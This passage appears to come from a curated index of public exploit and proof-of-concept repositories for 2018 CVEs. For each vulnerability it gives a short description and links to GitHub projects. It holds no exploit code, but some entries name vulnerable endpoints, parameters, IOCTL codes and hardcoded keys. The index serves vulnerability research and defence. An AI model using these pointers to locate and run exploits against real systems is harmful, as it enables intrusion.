Snoopy 1.0 in Nagios XI 5.5.6 allows remote unauthenticated attackers to execute arbitrary commands via a crafted HTTP request.
- [lkduy2602/Detecting-CVE-2018-15708-Vulnerabilities](https://github.com/lkduy2602/Detecting-CVE-2018-15708-Vulnerabilities)
### CVE-2018-15727 (2018-08-29)
Grafana 2.x, 3.x, and 4.x before 4.6.4 and 5.x before 5.2.3 allows authentication bypass because an attacker can generate a valid "remember me" cookie knowing only a username of an LDAP or OAuth user.
- [u238/grafana-CVE-2018-15727](https://github.com/u238/grafana-CVE-2018-15727)
- [grimbelhax/CVE-2018-15727](https://github.com/grimbelhax/CVE-2018-15727)
### CVE-2018-15832 (2018-09-20)
upc.exe in Ubisoft Uplay Desktop Client versions 63.0.5699.0 allows remote attackers to execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of URI handlers. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code under the context of the current process.
- [JacksonKuo/Ubisoft-Uplay-Desktop-Client-63.0.5699.0](https://github.com/JacksonKuo/Ubisoft-Uplay-Desktop-Client-63.0.5699.0)
### CVE-2018-15835 (2018-11-30)
Android 1.0 through 9.0 has Insecure Permissions. The Android bug ID is 77286983.
- [Chirantar7004/Android-Passive-Location-Tracker](https://github.com/Chirantar7004/Android-Passive-Location-Tracker)
### CVE-2018-15877 (2018-08-26)
The Plainview Activity Monitor plugin before 20180826 for WordPress is vulnerable to OS command injection via shell metacharacters in the ip parameter of a wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools request.
- [cved-sources/cve-2018-15877](https://github.com/cved-sources/cve-2018-15877)
- [Cinnamon1212/CVE-2018-15877-RCE](https://github.com/Cinnamon1212/CVE-2018-15877-RCE)
### CVE-2018-15912 (2018-08-29)
An issue was discovered in manjaro-update-system.sh in manjaro-system 20180716-1 on Manjaro Linux. A local attacker can install or remove arbitrary packages and package repositories potentially containing hooks with arbitrary code, which will automatically be run as root, or remove packages vital to the system.
- [coderobe/CVE-2018-15912-PoC](https://github.com/coderobe/CVE-2018-15912-PoC)
### CVE-2018-15961 (2018-09-25)
Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
- [vah13/CVE-2018-15961](https://github.com/vah13/CVE-2018-15961)
- [cved-sources/cve-2018-15961](https://github.com/cved-sources/cve-2018-15961)
- [xbufu/CVE-2018-15961](https://github.com/xbufu/CVE-2018-15961)
- [orangmuda/CVE-2018-15961](https://github.com/orangmuda/CVE-2018-15961)
- [bu1xuan2/CVE-2018-15961](https://github.com/bu1xuan2/CVE-2018-15961)
### CVE-2018-15968 (2018-10-12)
Adobe Acrobat and Reader versions 2018.011.20063 and earlier, 2017.011.30102 and earlier, and 2015.006.30452 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.
- [sharmasandeepkr/cve-2018-15968](https://github.com/sharmasandeepkr/cve-2018-15968)
### CVE-2018-15982 (2019-01-18)
Flash Player versions 31.0.0.153 and earlier, and 31.0.0.108 and earlier have a use after free vulnerability. Successful exploitation could lead to arbitrary code execution.
- [FlatL1neAPT/CVE-2018-15982](https://github.com/FlatL1neAPT/CVE-2018-15982)
- [Ormicron/CVE-2018-15982_PoC](https://github.com/Ormicron/CVE-2018-15982_PoC)
- [Ridter/CVE-2018-15982_EXP](https://github.com/Ridter/CVE-2018-15982_EXP)
- [kphongagsorn/adobe-flash-cve2018-15982](https://github.com/kphongagsorn/adobe-flash-cve2018-15982)
- [jas502n/CVE-2018-15982_EXP_IE](https://github.com/jas502n/CVE-2018-15982_EXP_IE)
- [scanfsec/CVE-2018-15982](https://github.com/scanfsec/CVE-2018-15982)
- [SyFi/CVE-2018-15982](https://github.com/SyFi/CVE-2018-15982)
- [create12138/CVE-2018-15982](https://github.com/create12138/CVE-2018-15982)
### CVE-2018-16119 (2019-06-20)
Stack-based buffer overflow in the httpd server of TP-Link WR1043nd (Firmware Version 3) allows remote attackers to execute arbitrary code via a malicious MediaServer request to /userRpm/MediaServerFoldersCfgRpm.htm.
- [hdbreaker/CVE-2018-16119](https://github.com/hdbreaker/CVE-2018-16119)
### CVE-2018-16156 (2019-05-17)
In PaperStream IP (TWAIN) 1.42.0.5685 (Service Update 7), the FJTWSVIC service running with SYSTEM privilege processes unauthenticated messages received over the FjtwMkic_Fjicube_32 named pipe. One of these message processing functions attempts to dynamically load the UninOldIS.dll library and executes an exported function named ChangeUninstallString. The default install does not contain this library and therefore if any DLL with that name exists in any directory listed in the PATH variable, it can be used to escalate to SYSTEM level privilege.
- [securifera/CVE-2018-16156-Exploit](https://github.com/securifera/CVE-2018-16156-Exploit)
### CVE-2018-16167 (2019-01-09)
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
- [dnr6419/CVE-2018-16167](https://github.com/dnr6419/CVE-2018-16167)
### CVE-2018-16283 (2018-09-24)
The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter.
- [cved-sources/cve-2018-16283](https://github.com/cved-sources/cve-2018-16283)
### CVE-2018-16323 (2018-09-01)
ReadXBMImage in coders/xbm.c in ImageMagick before 7.0.8-9 leaves data uninitialized when processing an XBM file that has a negative pixel value. If the affected code is used as a library loaded into a process that includes sensitive information, that information sometimes can be leaked via the image data.
- [ttffdd/XBadManners](https://github.com/ttffdd/XBadManners)
### CVE-2018-16341
- [mpgn/CVE-2018-16341](https://github.com/mpgn/CVE-2018-16341)
- [CN016/Nuxeo-CVE-2018-16341](https://github.com/CN016/Nuxeo-CVE-2018-16341)
### CVE-2018-16370 (2018-09-03)
In PESCMS Team 2.2.1, attackers may upload and execute arbitrary PHP code through /Public/?g=Team&m=Setting&a=upgrade by placing a .php file in a ZIP archive.
- [snappyJack/CVE-2018-16370](https://github.com/snappyJack/CVE-2018-16370)
### CVE-2018-16373 (2018-09-03)
Frog CMS 0.9.5 has an Upload vulnerability that can create files via /admin/?/plugin/file_manager/save.
- [snappyJack/CVE-2018-16373](https://github.com/snappyJack/CVE-2018-16373)
### CVE-2018-16431 (2018-09-04)
admin/admin/adminsave.html in YFCMF v3.0 allows CSRF to add an administrator account.
- [RHYru9/CVE-2018-16431](https://github.com/RHYru9/CVE-2018-16431)
### CVE-2018-16492 (2019-02-01)
A prototype pollution vulnerability was found in module extend <2.0.2, ~<3.0.2 that allows an attacker to inject arbitrary properties onto Object.prototype.
- [dsp-testing/CVE-2018-16492](https://github.com/dsp-testing/CVE-2018-16492)
### CVE-2018-16509 (2018-09-05)
An issue was discovered in Artifex Ghostscript before 9.24. Incorrect "restoration of privilege" checking during handling of /invalidaccess exceptions could be used by attackers able to supply crafted PostScript to execute code using the "pipe" instruction.
- [farisv/PIL-RCE-Ghostscript-CVE-2018-16509](https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509)
- [knqyf263/CVE-2018-16509](https://github.com/knqyf263/CVE-2018-16509)
- [cved-sources/cve-2018-16509](https://github.com/cved-sources/cve-2018-16509)
- [rhpco/CVE-2018-16509](https://github.com/rhpco/CVE-2018-16509)
### CVE-2018-16706 (2018-09-14)
LG SuperSign CMS allows TVs to be rebooted remotely without authentication via a direct HTTP request to /qsr_server/device/reboot on port 9080.
- [Nurdilin/CVE-2018-16706](https://github.com/Nurdilin/CVE-2018-16706)
### CVE-2018-16711 (2018-09-26)
IObit Advanced SystemCare, which includes Monitor_win10_x64.sys or Monitor_win7_x64.sys, 1.2.0.5 (and possibly earlier versions) allows a user to send an IOCTL (0x9C402088) with a buffer containing user defined content. The driver's subroutine will execute a wrmsr instruction with the user's buffer for input.
- [DownWithUp/CVE-2018-16711](https://github.com/DownWithUp/CVE-2018-16711)
### CVE-2018-16712 (2018-09-26)
IObit Advanced SystemCare, which includes Monitor_win10_x64.sys or Monitor_win7_x64.sys, 1.2.0.5 (and possibly earlier versions) allows a user to send a specially crafted IOCTL 0x9C406104 to read physical memory.
- [DownWithUp/CVE-2018-16712](https://github.com/DownWithUp/CVE-2018-16712)
### CVE-2018-16713 (2018-09-26)
IObit Advanced SystemCare, which includes Monitor_win10_x64.sys or Monitor_win7_x64.sys, 1.2.0.5 (and possibly earlier versions) allows a user to send an IOCTL (0x9C402084) with a buffer containing user defined content. The driver's subroutine will execute a rdmsr instruction with the user's buffer for input, and provide output from the instruction.
- [DownWithUp/CVE-2018-16713](https://github.com/DownWithUp/CVE-2018-16713)
### CVE-2018-16763 (2018-09-09)
FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.
- [dinhbaouit/CVE-2018-16763](https://github.com/dinhbaouit/CVE-2018-16763)
- [hikarihacks/CVE-2018-16763-exploit](https://github.com/hikarihacks/CVE-2018-16763-exploit)
- [n3m1sys/CVE-2018-16763-Exploit-Python3](https://github.com/n3m1sys/CVE-2018-16763-Exploit-Python3)
- [uwueviee/Fu3l-F1lt3r](https://github.com/uwueviee/Fu3l-F1lt3r)
- [shoamshilo/Fuel-CMS-Remote-Code-Execution-1.4--RCE--](https://github.com/shoamshilo/Fuel-CMS-Remote-Code-Execution-1.4--RCE--)
- [kxisxr/Bash-Script-CVE-2018-16763](https://github.com/kxisxr/Bash-Script-CVE-2018-16763)
- [padsalatushal/CVE-2018-16763](https://github.com/padsalatushal/CVE-2018-16763)
- [wizardy0ga/THM-Vulnerability_Capstone-CVE-2018-16763](https://github.com/wizardy0ga/THM-Vulnerability_Capstone-CVE-2018-16763)
- [h3xcr4ck3r/CVE-2018-16763](https://github.com/h3xcr4ck3r/CVE-2018-16763)
- [BrunoPincho/cve-2018-16763-rust](https://github.com/BrunoPincho/cve-2018-16763-rust)
- [p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE)
- [not1cyyy/CVE-2018-16763](https://github.com/not1cyyy/CVE-2018-16763)
- [antisecc/CVE-2018-16763](https://github.com/antisecc/CVE-2018-16763)
- [VitoBonetti/CVE-2018-16763](https://github.com/VitoBonetti/CVE-2018-16763)
### CVE-2018-16809 (2019-03-07)
An issue was discovered in Dolibarr through 7.0.0. expensereport/card.php in the expense reports module allows SQL injection via the integer parameters qty and value_unit.
- [elkassimyhajar/CVE-2018-16809](https://github.com/elkassimyhajar/CVE-2018-16809)
### CVE-2018-16843 (2018-11-07)
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive memory consumption. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the 'http2' option of the 'listen' directive is used in a configuration file.
- [flyniu666/ingress-nginx-0.21-1.19.5](https://github.com/flyniu666/ingress-nginx-0.21-1.19.5)
### CVE-2018-16854 (2018-11-26)
A flaw was found in moodle versions 3.5 to 3.5.2, 3.4 to 3.4.5, 3.3 to 3.3.8, 3.1 to 3.1.14 and earlier. The login form is not protected by a token to prevent login cross-site request forgery. Fixed versions include 3.6, 3.5.3, 3.4.6, 3.3.9 and 3.1.15.
- [danielthatcher/moodle-login-csrf](https://github.com/danielthatcher/moodle-login-csrf)
### CVE-2018-16858 (2019-03-25)
It was found that libreoffice before versions 6.0.7 and 6.1.3 was vulnerable to a directory traversal attack which could be used to execute arbitrary macros bundled with a document. An attacker could craft a document, which when opened by LibreOffice, would execute a Python method from a script in any arbitrary file system location, specified relative to the LibreOffice install location.
- [4nimanegra/libreofficeExploit1](https://github.com/4nimanegra/libreofficeExploit1)
- [phongld97/detect-cve-2018-16858](https://github.com/phongld97/detect-cve-2018-16858)
- [bantu2301/CVE-2018-16858](https://github.com/bantu2301/CVE-2018-16858)
- [Henryisnotavailable/CVE-2018-16858-Python](https://github.com/Henryisnotavailable/CVE-2018-16858-Python)
### CVE-2018-16875 (2018-12-14)
The crypto/x509 package of Go before 1.10.6 and 1.11.x before 1.11.3 does not limit the amount of work performed for each chain verification, which might allow attackers to craft pathological inputs leading to a CPU denial of service. Go TLS servers accepting client certificates and TLS clients are affected.
- [alexzorin/poc-cve-2018-16875](https://github.com/alexzorin/poc-cve-2018-16875)
### CVE-2018-16890 (2019-02-06)
libcurl versions from 7.36.0 to before 7.64.0 is vulnerable to a heap buffer out-of-bounds read. The function handling incoming NTLM type-2 messages (`lib/vauth/ntlm.c:ntlm_decode_type2_target`) does not validate incoming data correctly and is subject to an integer overflow vulnerability. Using that overflow, a malicious or broken NTLM server could trick libcurl to accept a bad length + offset combination that would lead to a buffer read out-of-bounds.
- [michelleamesquita/CVE-2018-16890](https://github.com/michelleamesquita/CVE-2018-16890)
### CVE-2018-16987 (2018-09-13)
Squash TM through 1.18.0 presents the cleartext passwords of external services in the administration panel, as demonstrated by a ta-server-password field in the HTML source code.
- [gquere/CVE-2018-16987](https://github.com/gquere/CVE-2018-16987)
### CVE-2018-17081 (2018-09-26)
e107 2.1.9 allows CSRF via e107_admin/wmessage.php?mode=&action=inline&ajax_used=1&id= for changing the title of an arbitrary page.
- [himanshurahi/e107_2.1.9_CSRF_POC](https://github.com/himanshurahi/e107_2.1.9_CSRF_POC)
### CVE-2018-17144 (2018-09-19)
Bitcoin Core 0.14.x before 0.14.3, 0.15.x before 0.15.2, and 0.16.x before 0.16.3 and Bitcoin Knots 0.14.x through 0.16.x before 0.16.3 allow a remote denial of service (application crash) exploitable by miners via duplicate input. An attacker can make bitcoind or Bitcoin-Qt crash.
- [iioch/ban-exploitable-bitcoin-nodes](https://github.com/iioch/ban-exploitable-bitcoin-nodes)
- [hikame/CVE-2018-17144_POC](https://github.com/hikame/CVE-2018-17144_POC)
### CVE-2018-17182 (2018-09-19)
An issue was discovered in the Linux kernel through 4.18.8. The vmacache_flush_all function in mm/vmacache.c mishandles sequence number overflows. An attacker can trigger a use-after-free (and possibly gain privileges) via certain thread creation, map, unmap, invalidation, and dereference operations.
- [jas502n/CVE-2018-17182](https://github.com/jas502n/CVE-2018-17182)
- [likekabin/CVE-2018-17182](https://github.com/likekabin/CVE-2018-17182)
- [likekabin/vmacache_CVE-2018-17182](https://github.com/likekabin/vmacache_CVE-2018-17182)
- [jedai47/cve-2018-17182](https://github.com/jedai47/cve-2018-17182)
### CVE-2018-17207 (2018-09-19)
An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution.
- [cved-sources/cve-2018-17207](https://github.com/cved-sources/cve-2018-17207)
### CVE-2018-17240 (2022-06-10)
There is a memory dump vulnerability on Netwave IP camera devices at //proc/kcore that allows an unauthenticated attacker to exfiltrate sensitive information from the network configuration (e.g., username and password).
- [BBge/CVE-2018-17240](https://github.com/BBge/CVE-2018-17240)
- [Xewdy444/Netgrave](https://github.com/Xewdy444/Netgrave)
### CVE-2018-17246 (2018-12-20)
Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
- [mpgn/CVE-2018-17246](https://github.com/mpgn/CVE-2018-17246)
### CVE-2018-17254 (2018-09-20)
The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
- [Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection](https://github.com/Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection)
- [MataKucing-OFC/CVE-2018-17254](https://github.com/MataKucing-OFC/CVE-2018-17254)
### CVE-2018-17418 (2019-03-07)
Monstra CMS 3.0.4 allows remote attackers to execute arbitrary PHP code via a mixed-case file extension, as demonstrated by the 123.PhP filename, because plugins\box\filesmanager\filesmanager.admin.php mishandles the forbidden_types variable.
- [Jx0n0/monstra_cms-3.0.4--getshell](https://github.com/Jx0n0/monstra_cms-3.0.4--getshell)
### CVE-2018-17431 (2019-01-29)
Web Console in Comodo UTM Firewall before 2.7.0 allows remote attackers to execute arbitrary code without authentication via a crafted URL.
- [Fadavvi/CVE-2018-17431-PoC](https://github.com/Fadavvi/CVE-2018-17431-PoC)
- [sanan2004/CVE-2018-17431-Comodo](https://github.com/sanan2004/CVE-2018-17431-Comodo)
### CVE-2018-17456 (2018-10-06)
Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive "git clone" of a superproject if a .gitmodules file has a URL field beginning with a '-' character.
- [shpik-kr/CVE-2018-17456](https://github.com/shpik-kr/CVE-2018-17456)
- [matlink/CVE-2018-17456](https://github.com/matlink/CVE-2018-17456)
- [799600966/CVE-2018-17456](https://github.com/799600966/CVE-2018-17456)
- [AnonymKing/CVE-2018-17456](https://github.com/AnonymKing/CVE-2018-17456)
- [jiahuiLeee/test](https://github.com/jiahuiLeee/test)
- [KKkai0315/CVE-2018-17456](https://github.com/KKkai0315/CVE-2018-17456)
### CVE-2018-17463 (2018-11-14)
Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.
- [kdmarti2/CVE-2018-17463](https://github.com/kdmarti2/CVE-2018-17463)
- [jhalon/CVE-2018-17463](https://github.com/jhalon/CVE-2018-17463)
### CVE-2018-17552 (2018-10-03)
SQL Injection in login.php in Naviwebs Navigate CMS 2.8 allows remote attackers to bypass authentication via the navigate-user cookie.
- [kimstars/CVE-2018-17552](https://github.com/kimstars/CVE-2018-17552)
### CVE-2018-17553 (2018-10-03)
An "Unrestricted Upload of File with Dangerous Type" issue with directory traversal in navigate_upload.php in Naviwebs Navigate CMS 2.8 allows authenticated attackers to achieve remote code execution via a POST request with engine=picnik and id=../../../navigate_info.php.
- [MidwintersTomb/CVE-2018-17553](https://github.com/MidwintersTomb/CVE-2018-17553)
### CVE-2018-17873 (2018-10-23)
An incorrect access control vulnerability in the FTP configuration of WiFiRanger devices with firmware version 7.0.8rc3 and earlier allows an attacker with adjacent network access to read the SSH Private Key and log in to the root account.
- [Luct0r/CVE-2018-17873](https://github.com/Luct0r/CVE-2018-17873)
### CVE-2018-17924 (2018-12-07)
Rockwell Automation MicroLogix 1400 Controllers and 1756 ControlLogix Communications Modules An unauthenticated, remote threat actor could send a CIP connection request to an affected device, and upon successful connection, send a new IP configuration to the affected device even if the controller in the system is set to Hard RUN mode. When the affected device accepts this new IP configuration, a loss of communication occurs between the device and the rest of the system as the system traffic is still attempting to communicate with the device via the overwritten IP address.
- [g0dd0ghd/CVE-2018-17924-PoC](https://github.com/g0dd0ghd/CVE-2018-17924-PoC)
### CVE-2018-17961 (2018-10-15)
Artifex Ghostscript 9.25 and earlier allows attackers to bypass a sandbox protection mechanism via vectors involving errorhandler setup. NOTE: this issue exists because of an incomplete fix for CVE-2018-17183.
- [matlink/CVE-2018-17961](https://github.com/matlink/CVE-2018-17961)
### CVE-2018-18026 (2018-10-19)
IMFCameraProtect.sys in IObit Malware Fighter 6.2 (and possibly lower versions) is vulnerable to a stack-based buffer overflow. The attacker can use DeviceIoControl to pass a user specified size which can be used to overwrite return addresses. This can lead to a denial of service or code execution attack.
- [DownWithUp/CVE-2018-18026](https://github.com/DownWithUp/CVE-2018-18026)
### CVE-2018-18333 (2019-02-05)
A DLL hijacking vulnerability in Trend Micro Security 2019 (Consumer) versions below 15.0.0.1163 and below could allow an attacker to manipulate a specific DLL and escalate privileges on vulnerable installations.
- [mrx04programmer/Dr.DLL-CVE-2018-18333](https://github.com/mrx04programmer/Dr.DLL-CVE-2018-18333)
### CVE-2018-18368 (2019-11-15)
Symantec Endpoint Protection Manager (SEPM), prior to 14.2 RU1, may be susceptible to a privilege escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.
- [DimopoulosElias/SEPM-EoP](https://github.com/DimopoulosElias/SEPM-EoP)
### CVE-2018-18387 (2018-10-29)
playSMS through 1.4.2 allows Privilege Escalation through Daemon abuse.
- [TheeBlind/CVE-2018-18387](https://github.com/TheeBlind/CVE-2018-18387)
### CVE-2018-18500 (2019-02-05)
A use-after-free vulnerability can occur while parsing an HTML5 stream in concert with custom HTML elements. This results in the stream parser object being freed while still in use, leading to a potentially exploitable crash. This vulnerability affects Thunderbird < 60.5, Firefox ESR < 60.5, and Firefox < 65.
- [sophoslabs/CVE-2018-18500](https://github.com/sophoslabs/CVE-2018-18500)
### CVE-2018-18649 (2018-11-29)
An issue was discovered in the wiki API in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It allows for remote code execution.
- [Snowming04/CVE-2018-18649](https://github.com/Snowming04/CVE-2018-18649)
### CVE-2018-18714 (2018-11-01)
RegFilter.sys in IOBit Malware Fighter 6.2 and earlier is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E010. This can lead to denial of service (DoS) or code execution with root privileges.
- [DownWithUp/CVE-2018-18714](https://github.com/DownWithUp/CVE-2018-18714)
### CVE-2018-18778 (2018-10-29)
ACME mini_httpd before 1.30 lets remote users read arbitrary files.
- [cyberharsh/Mini_httpd-CVE-2018-18778](https://github.com/cyberharsh/Mini_httpd-CVE-2018-18778)
- [auk0x01/CVE-2018-18778-Scanner](https://github.com/auk0x01/CVE-2018-18778-Scanner)
### CVE-2018-18852 (2019-06-18)
Cerio DT-300N 1.1.6 through 1.1.12 devices allow OS command injection because of improper input validation of the web-interface PING feature's use of Save.cgi to execute a ping command, as exploited in the wild in October 2018.
- [hook-s3c/CVE-2018-18852](https://github.com/hook-s3c/CVE-2018-18852)
- [andripwn/CVE-2018-18852](https://github.com/andripwn/CVE-2018-18852)
### CVE-2018-18893 (2019-01-03)
Jinjava before 2.4.6 does not block the getClass method, related to com/hubspot/jinjava/el/ext/JinjavaBeanELResolver.java.
- [LycsHub/CVE-2018-18893](https://github.com/LycsHub/CVE-2018-18893)
### CVE-2018-18925 (2018-11-04)
Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.
- [j4k0m/CVE-2018-18925](https://github.com/j4k0m/CVE-2018-18925)
### CVE-2018-18955 (2018-11-16)
In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.
- [scheatkode/CVE-2018-18955](https://github.com/scheatkode/CVE-2018-18955)
### CVE-2018-19052 (2018-11-07)
An issue was discovered in mod_alias_physical_handler in mod_alias.c in lighttpd before 1.4.50. There is potential ../ path traversal of a single directory above an alias target, with a specific mod_alias configuration where the matched alias lacks a trailing '/' character, but the alias target filesystem path does have a trailing '/' character.
- [iveresk/cve-2018-19052](https://github.com/iveresk/cve-2018-19052)
### CVE-2018-19126 (2018-11-09)
PrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 allows remote attackers to execute arbitrary code via a file upload.
- [farisv/PrestaShop-CVE-2018-19126](https://github.com/farisv/PrestaShop-CVE-2018-19126)
### CVE-2018-19127 (2018-11-09)
A code injection vulnerability in /type.php in PHPCMS 2008 allows attackers to write arbitrary content to a website cache file with a controllable filename, leading to arbitrary code execution. The PHP code is sent via the template parameter, and is written to a data/cache_template/*.tpl.php file along with a "<?php function " substring.
- [ab1gale/phpcms-2008-CVE-2018-19127](https://github.com/ab1gale/phpcms-2008-CVE-2018-19127)
### CVE-2018-19131 (2018-11-09)
Squid before 4.4 has XSS via a crafted X.509 certificate during HTTP(S) error page generation for certificate errors.
- [JonathanWilbur/CVE-2018-19131](https://github.com/JonathanWilbur/CVE-2018-19131)
### CVE-2018-19207 (2018-11-12)
The Van Ons WP GDPR Compliance (aka wp-gdpr-compliance) plugin before 1.4.3 for WordPress allows remote attackers to execute arbitrary code because $wpdb->prepare() input is mishandled, as exploited in the wild in November 2018.
- [aeroot/WP-GDPR-Compliance-Plugin-Exploit](https://github.com/aeroot/WP-GDPR-Compliance-Plugin-Exploit)
- [cved-sources/cve-2018-19207](https://github.com/cved-sources/cve-2018-19207)
### CVE-2018-19246 (2018-11-13)
PHP-Proxy 5.1.0 allows remote attackers to read local files if the default "pre-installed version" (intended for users who lack shell access to their web server) is used. This occurs because the aeb067ca0aa9a3193dce3a7264c90187 app_key value from the default config.php is in place, and this value can be easily used to calculate the authorization data needed for local file inclusion.
- [NeoWans/CVE-2018-19246](https://github.com/NeoWans/CVE-2018-19246)
### CVE-2018-19276 (2019-03-17)
OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.
- [mpgn/CVE-2018-19276](https://github.com/mpgn/CVE-2018-19276)
### CVE-2018-19320 (2018-12-21)
The GDrv low-level driver in GIGABYTE APP Center v1.05.21 and earlier, AORUS GRAPHICS ENGINE before 1.57, XTREME GAMING ENGINE before 1.26, and OC GURU II v2.08 exposes ring0 memcpy-like functionality that could allow a local attacker to take complete control of the affected system.
- [ASkyeye/CVE-2018-19320](https://github.com/ASkyeye/CVE-2018-19320)
- [hmnthabit/CVE-2018-19320-LPE](https://github.com/hmnthabit/CVE-2018-19320-LPE)
- [zer0condition/GDRVLoader](https://github.com/zer0condition/GDRVLoader)
### CVE-2018-19321 (2018-12-21)
The GPCIDrv and GDrv low-level drivers in GIGABYTE APP Center v1.05.21 and earlier, AORUS GRAPHICS ENGINE before 1.57, XTREME GAMING ENGINE before 1.26, and OC GURU II v2.08 expose functionality to read and write arbitrary physical memory. This could be leveraged by a local attacker to elevate privileges.
- [nanabingies/Driver-RW](https://github.com/nanabingies/Driver-RW)
- [nanabingies/CVE-2018-19321](https://github.com/nanabingies/CVE-2018-19321)
### CVE-2018-19410 (2018-11-21)
PRTG Network Monitor before 18.2.40.1683 allows remote unauthenticated attackers to create users with read-write privileges (including administrator). A remote unauthenticated user can craft an HTTP request and override attributes of the 'include' directive in /public/login.htm and perform a Local File Inclusion attack, by including /api/addusers and executing it. By providing the 'id' and 'users' parameters, an unauthenticated attacker can create a user with read-write privileges (including administrator).
- [himash/CVE-2018-19410-POC](https://github.com/himash/CVE-2018-19410-POC)
### CVE-2018-19422 (2018-11-21)
/panel/uploads in Subrion CMS 4.2.1 allows remote attackers to execute arbitrary PHP code via a .pht or .phar file, because the .htaccess file omits these.
- [hev0x/CVE-2018-19422-SubrionCMS-RCE](https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE)
- [Swammers8/SubrionCMS-4.2.1-File-upload-RCE-auth-](https://github.com/Swammers8/SubrionCMS-4.2.1-File-upload-RCE-auth-)
### CVE-2018-19466 (2019-03-27)
A vulnerability was found in Portainer before 1.20.0. Portainer stores LDAP credentials, corresponding to a master password, in cleartext and allows their retrieval via API calls.
- [MauroEldritch/lempo](https://github.com/MauroEldritch/lempo)
### CVE-2018-19487 (2019-03-17)
The WP-jobhunt plugin before version 2.4 for WordPress does not control AJAX requests sent to the cs_employer_ajax_profile() function through the admin-ajax.php file, which allows remote unauthenticated attackers to enumerate information about users.
- [YOLOP0wn/wp-jobhunt-exploit](https://github.com/YOLOP0wn/wp-jobhunt-exploit)
### CVE-2018-19518 (2018-11-25)
University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument.
- [ensimag-security/CVE-2018-19518](https://github.com/ensimag-security/CVE-2018-19518)
- [houqe/EXP_CVE-2018-19518](https://github.com/houqe/EXP_CVE-2018-19518)
### CVE-2018-19537 (2018-11-26)
TP-Link Archer C5 devices through V2_160201_US allow remote command execution via shell metacharacters on the wan_dyn_hostname line of a configuration file that is encrypted with the 478DA50BF9E3D2CF key and uploaded through the web GUI by using the web admin account. The default password of admin may be used in some cases.
- [JackDoan/TP-Link-ArcherC5-RCE](https://github.com/JackDoan/TP-Link-ArcherC5-RCE)
### CVE-2018-19571 (2019-07-10)
GitLab CE/EE, versions 8.18 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an SSRF vulnerability in webhooks.
- [xenophil90/edb-49263-fixed](https://github.com/xenophil90/edb-49263-fixed)
- [Algafix/gitlab-RCE-11.4.7](https://github.com/Algafix/gitlab-RCE-11.4.7)
- [CS4239-U6/gitlab-ssrf](https://github.com/CS4239-U6/gitlab-ssrf)
### CVE-2018-19592 (2019-09-27)
The "CLink4Service" service is installed with Corsair Link 4.9.7.35 with insecure permissions by default. This allows unprivileged users to take control of the service and execute commands in the context of NT AUTHORITY\SYSTEM, leading to total system takeover, a similar issue to CVE-2018-12441.
- [BradyDonovan/CVE-2018-19592](https://github.com/BradyDonovan/CVE-2018-19592)
### CVE-2018-19788 (2018-12-03)
A flaw was found in PolicyKit (aka polkit) 0.115 that allows a user with a uid greater than INT_MAX to successfully execute any systemctl command.
- [AbsoZed/CVE-2018-19788](https://github.com/AbsoZed/CVE-2018-19788)
